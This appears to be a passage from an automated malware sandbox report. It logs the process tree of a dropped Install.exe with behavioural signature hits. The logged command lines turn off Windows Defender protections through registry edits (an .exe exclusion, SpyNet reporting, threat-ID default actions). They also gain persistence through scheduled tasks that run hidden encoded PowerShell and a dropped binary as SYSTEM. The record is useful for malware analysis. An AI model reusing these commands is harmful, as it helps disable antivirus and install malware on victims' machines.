|
C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe
|
.\Install.exe
|
 |
|
| Is windows: |
false
|
| Is dropped: |
true
|
| PID: |
4760
|
| Target ID: |
3
|
| Parent PID: |
5932
|
| Name: |
Install.exe
|
| Path: |
C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe
|
| Commandline: |
.\Install.exe
|
| Size: |
6571809
|
| MD5: |
65D01849A2062434BCE6C580CDA92A1D
|
| Time: |
19:03:59
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
low
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x400000
|
| Modulesize: |
163840
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Sigma detected: Schedule system process |
Persistence and Installation Behavior |
|
| Dropped file seen in connection with other malware |
System Summary |
|
| Drops PE files |
Persistence and Installation Behavior |
|
| Spawns processes |
System Summary |
|
|
|
C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe
|
.\Install.exe /S /site_id "525403"
|
|
|
| Is windows: |
false
|
| Is dropped: |
true
|
| PID: |
5620
|
| Target ID: |
5
|
| Parent PID: |
4760
|
| Name: |
Install.exe
|
| Path: |
C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe
|
| Commandline: |
.\Install.exe /S /site_id "525403"
|
| Size: |
7104512
|
| MD5: |
893793FBD70BA4A92919D09205D6C9C1
|
| Time: |
19:04:01
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
low
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x230000
|
| Modulesize: |
17829888
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Sigma detected: Schedule system process |
Persistence and Installation Behavior |
|
| Dropped file seen in connection with other malware |
System Summary |
|
| Drops PE files |
Persistence and Installation Behavior |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32®
ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
3096
|
| Target ID: |
14
|
| Parent PID: |
4732
|
| Name: |
cmd.exe
|
| Class: |
cmd
|
| Path: |
C:\Windows\SysWOW64\cmd.exe
|
| Commandline: |
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32®
ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
|
| Size: |
232960
|
| MD5: |
F3BDBE3BB6F734E357235F4D5898582D
|
| Time: |
19:04:05
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
high
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x11d0000
|
| Modulesize: |
364544
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
1544
|
| Target ID: |
15
|
| Parent PID: |
3096
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
19:04:05
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
high
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbe0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32®
ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6152
|
| Target ID: |
16
|
| Parent PID: |
5064
|
| Name: |
cmd.exe
|
| Class: |
cmd
|
| Path: |
C:\Windows\SysWOW64\cmd.exe
|
| Commandline: |
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32®
ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
|
| Size: |
232960
|
| MD5: |
F3BDBE3BB6F734E357235F4D5898582D
|
| Time: |
19:04:05
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
high
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x11d0000
|
| Modulesize: |
364544
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6172
|
| Target ID: |
17
|
| Parent PID: |
6152
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
19:04:06
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
high
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbe0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6180
|
| Target ID: |
18
|
| Parent PID: |
3096
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
19:04:06
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbe0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6208
|
| Target ID: |
19
|
| Parent PID: |
6152
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
19:04:06
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xbe0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6236
|
| Target ID: |
20
|
| Parent PID: |
5620
|
| Name: |
schtasks.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\schtasks.exe
|
| Commandline: |
schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
|
| Size: |
185856
|
| MD5: |
15FF7D8324231381BAD48A052F85DF04
|
| Time: |
19:04:09
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x1160000
|
| Modulesize: |
204800
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Sigma detected: Schedule system process |
Persistence and Installation Behavior |
|
| Uses schtasks.exe or at.exe to add and modify task schedules |
Boot Survival |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
schtasks /run /I /tn "gAhELFxgt"
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6276
|
| Target ID: |
22
|
| Parent PID: |
5620
|
| Name: |
schtasks.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\schtasks.exe
|
| Commandline: |
schtasks /run /I /tn "gAhELFxgt"
|
| Size: |
185856
|
| MD5: |
15FF7D8324231381BAD48A052F85DF04
|
| Time: |
19:04:09
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x1160000
|
| Modulesize: |
204800
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Sigma detected: Schedule system process |
Persistence and Installation Behavior |
|
| Uses schtasks.exe or at.exe to add and modify task schedules |
Boot Survival |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6316
|
| Target ID: |
24
|
| Parent PID: |
1084
|
| Name: |
powershell.exe
|
| Class: |
powershell
|
| Path: |
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
| Commandline: |
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
|
| Size: |
447488
|
| MD5: |
95000560239032BC68B4C2FDFCDEF913
|
| Time: |
19:04:10
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
false
|
| Is elevated: |
false
|
| Modulebase: |
0x7ff7fbaf0000
|
| Modulesize: |
458752
|
| Wow64: |
false
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Suspicious powershell command line found |
Data Obfuscation |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
schtasks /DELETE /F /TN "gAhELFxgt"
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6332
|
| Target ID: |
26
|
| Parent PID: |
5620
|
| Name: |
schtasks.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\schtasks.exe
|
| Commandline: |
schtasks /DELETE /F /TN "gAhELFxgt"
|
| Size: |
185856
|
| MD5: |
15FF7D8324231381BAD48A052F85DF04
|
| Time: |
19:04:10
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x1160000
|
| Modulesize: |
204800
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Sigma detected: Schedule system process |
Persistence and Installation Behavior |
|
| Uses schtasks.exe or at.exe to add and modify task schedules |
Boot Survival |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\"
DC /site_id 525403 /S" /V1 /F
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6488
|
| Target ID: |
28
|
| Parent PID: |
5620
|
| Name: |
schtasks.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\schtasks.exe
|
| Commandline: |
schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:05:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe\"
DC /site_id 525403 /S" /V1 /F
|
| Size: |
185856
|
| MD5: |
15FF7D8324231381BAD48A052F85DF04
|
| Time: |
19:04:14
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x1160000
|
| Modulesize: |
204800
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Sigma detected: Schedule system process |
Persistence and Installation Behavior |
|
| Uses schtasks.exe or at.exe to add and modify task schedules |
Boot Survival |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe
|
C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe DC /site_id 525403 /S
|
|
|
| Is windows: |
false
|
| Is dropped: |
true
|
| PID: |
6576
|
| Target ID: |
30
|
| Parent PID: |
1084
|
| Name: |
pJKKXsE.exe
|
| Path: |
C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe
|
| Commandline: |
C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe DC /site_id 525403 /S
|
| Size: |
7104512
|
| MD5: |
893793FBD70BA4A92919D09205D6C9C1
|
| Time: |
19:04:16
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x1090000
|
| Modulesize: |
17829888
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Dropped file seen in connection with other malware |
System Summary |
|
| Drops PE files |
Persistence and Installation Behavior |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\"
/t REG_SZ /d 6 /reg:64;"
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6604
|
| Target ID: |
31
|
| Parent PID: |
6576
|
| Name: |
powershell.exe
|
| Class: |
powershell
|
| Path: |
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
| Commandline: |
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\"
/t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\"
/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\"
/t REG_SZ /d 6 /reg:64;"
|
| Size: |
430592
|
| MD5: |
DBA3E6449E97D4E3DF64527EF7012A10
|
| Time: |
19:04:17
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0xe50000
|
| Modulesize: |
442368
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Suspicious powershell command line found |
Data Obfuscation |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction"
/f /v 225451 /t REG_SZ /d 6 /reg:32
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6176
|
| Target ID: |
38
|
| Parent PID: |
6604
|
| Name: |
cmd.exe
|
| Class: |
cmd
|
| Path: |
C:\Windows\SysWOW64\cmd.exe
|
| Commandline: |
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction"
/f /v 225451 /t REG_SZ /d 6 /reg:32
|
| Size: |
232960
|
| MD5: |
F3BDBE3BB6F734E357235F4D5898582D
|
| Time: |
19:04:51
|
| Date: |
24/11/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
